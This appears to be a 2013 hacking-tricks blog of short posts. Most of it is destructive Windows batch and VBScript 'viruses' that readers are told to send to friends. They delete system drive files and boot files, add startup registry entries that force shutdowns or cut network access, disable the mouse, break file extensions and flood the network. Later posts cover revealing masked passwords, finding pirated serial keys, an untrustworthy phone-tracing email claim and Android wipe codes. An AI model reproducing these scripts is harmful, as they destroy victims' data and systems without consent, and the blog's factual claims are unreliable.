Sunday, December 29, 2013

Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

#Vishal Jadhav
Make A Virus That Disable Mouse

Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save this file as virus.bat

Done you just created your virus.


#Vishal Jadhav
Create Virus on Notepad
1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

2 -> Virus Creation Trick 2 .
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

6 -> Virus Creation Trick 6
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y

Save It As Anything.bat

9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


13 -> Virus Creation Trick 13
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !


#Vishal Jadhav 

only for educational purpose

Wednesday, December 25, 2013

SIMPLE way to see the password behind asterisks

All you need to do is highlight and right click the password field of the target page, and click "Inspect Element".

For something like Facebook, here's how it would look:


Code:
<input type="password" class="inputtext" name="pass" id="pass" tabindex="2">

Now change the type="password" to type="text"

Spoiler (Click to View)

And there you have it!
Unfortunately I couldn't show the password being revealed in real time since they are just images but you can test it out in the matter of seconds and see it work.

I've tested this with Yahoo, Gmail, YouTube and Facebook so I'm sure it works with various other sites as well.

Tested with Firefox and Chrome


#Vishal Jadhav
Use Pen drive as ram

1. Insert your pen-drive. Let your PC read it.(Minimum 2 GB)
2. Right click on My Computer. ( Click on Properties from context menu)
3. Click on Advanced tab.
4. Click on Settings under Performance.
5. Click on Advanced tab.
6. Click on Change button under Virtual memory.
7.Select your USB drive.
8.Click on custom size radio button and give the values as follows;
Initial Size:1020
Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.
9.Click on Set button, then click on OK.
10. Now you have to restart the computer. (The speed of your computer will be increased)


#Vishal Jadhav
Basic tips for Secure Browsing

1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your information carefully.

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily actiivities.


#Vishal Jadhav
How to Hack Memory card password
Hi friends! if you really want to hack any memory card's password from heart, you can try this trick. 
To hack the password, follow these steps-

1> open C:\System by using any file explore (where 'C:\' is ur memcard drive letter)

2> rename 'mmcstore' as 'mmcstore.txt'

3> open that file. There you can see the password. 

#Vishal Jadhav

Saturday, December 21, 2013

Trace ur stolen phone
==========================================

Hello visitor today I am going to share a very useful info which teach you how to trace your mobile phone if its being lost or stolen,,
As we all know that mobile is become the one of the most important part of our life and without it life become non communicative.. so follow the below some simple steps to trace ur mobile phone if it is lost.. or stolen

This is how it works!

1. Dial : *#06# from your mobile.

2. Your mobile shows a unique 15 digit.

3. Note down this no. anywhere but except your mobile as this is the no. which will help trace your mobile in case of a theft.

4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net

5. No need to go to police.

6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.

7. You will find where your hand set is being operated even in case your no. is being changed.

If u lost your mobile, send an e-mail to cop@vsnl.net

With the following info:

Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:

Keep all these information stored for emergency use..

*NOTE* - if above doesnt works than try to report @www.trackimei.com

10 best android secret tips 


 Android is the Linux based operating system designed primarily for touch screen mobile phones. Now a days android phones are so much popular that they covered almost 65% of total mobile phones market.They are rich in functionality as well as user friendly. Many android users don’t know much about the hidden features of android phones. Today we are sharing an article which will tell you the best secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try all the following android tricks. I am not sure which will going to work on your handset.



 1) Force reboot: Many times android users face a problem of freezing of mobile phone, In case your android phone is frozen, you can reboot it using an android trick.

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones built primarily for internet, many of android users don’t know that android phones provide a way by which we can access Google search in just a single click. To use this android trick, 

Press menu key and hold it for couple of seconds, it will launch the Google search.

3) Reboot Android in safe mode: 
As like computers, we can also reboot android phones in safe mode. The latest androidjelly bean version provides an option to reboot in safe mode, if something goes wrong. 
To reboot your android in safe mode, follow the below given instructions.
*Long press the power button 
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection: This is a cool android trick by which you can unlock your phone by using face detection, In the jelly bean version, android provides a way by which android phone can be unlock using face detection, to make this feature more secure, jelly bean version added another layer of protection in which android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this,

Go to Settings > Security > Screen lock > Face unlock.

5) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*
This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

6) Move android apps to SD cardIts good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

7) Hard Reset and Factory reset your android phone: 
This android trick comes handy at the time of selling an android phone. Android phone can be formatted in two ways


  • Factory reset
  • Hard reset
a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reseta phone dial *#*#7780#*#*.

b) Hard reset: 
To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for a confirmation.

8) Context menu in android:long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Taking screen shots on android phone:
 Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.


  • Press the Home button + power button (This trick work on most android phones.)
  • For Galaxy Nexus: Power button + volume down button.
  • For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

10) Android Version Animation: 
This is another cool android trick to play with your android phone. 
To use this android trick, Go to settings > about phone > Tab repeatedly on ‘Android version’.
After sometime, the android version will be animated.

#vishal
C program to shutdown windows7 :

# include <stdio.h>
# include <stdlib.h>
main ()
{
char ch ;
printf ("Do you want to shutdown your computer now (y/n) \n ") ;
scanf ( "%c" ,& ch ) ;
if ( ch == 'y' || ch == 'Y' )
system ( "C: \\ WINDOWS\\ System32 \\ shutdown /s" ) ;
return 0 ;
}


#vishal
Trick : How to Show Your Name after time in Taskbar !

Its Very Simple !
Step 1 : Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok !
Did It change? Then Ok..
If not, Go with the Next Step...
Step 2 : Now go to time in taskbar and Double Click it toopen "Date and time property"
Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered then , Apply -> OK !


#vishal
How To Create Undeletable And Unrenamable Folders ?
1. Go to Start and then Click on Run
-Type cmd & hit enter (To open Command Prompt ).
2. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
3. Type D: or E: and hit enter
4. Type md con\ and hit enter (md - make directory)
5. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
6. Open that directory, you will see the folder created of name con.
7. Try to delete that folder or rename that folder windows will show the error message.
Now the question is how to delete it when you really need to do?
1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory)
3. Open that directory and the folder will not appear because it is removed.
How To Create Undeletable And Unrenamable Folders ?
1. Go to Start and then Click on Run
-Type cmd & hit enter (To open Command Prompt ).
2. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
3. Type D: or E: and hit enter
4. Type md con\ and hit enter (md - make directory)
5. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
6. Open that directory, you will see the folder created of name con.
7. Try to delete that folder or rename that folder windows will show the error message.
Now the question is how to delete it when you really need to do?
1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory)
3. Open that directory and the folder will not appear because it is removed.


#vishal
*** HOW TO FIND SERIAL KEYS FROM GOOGLE***

steps:-
1) go to google.com

2) write the name of the software you want key
and add 94FBR at the end
Eg :- if you want to find key of IDM then write "
IDM 94FBR " (without quotes)

3) search it and you will find many sites with
serial keys of that softwares
DONE !!!!


#Vishal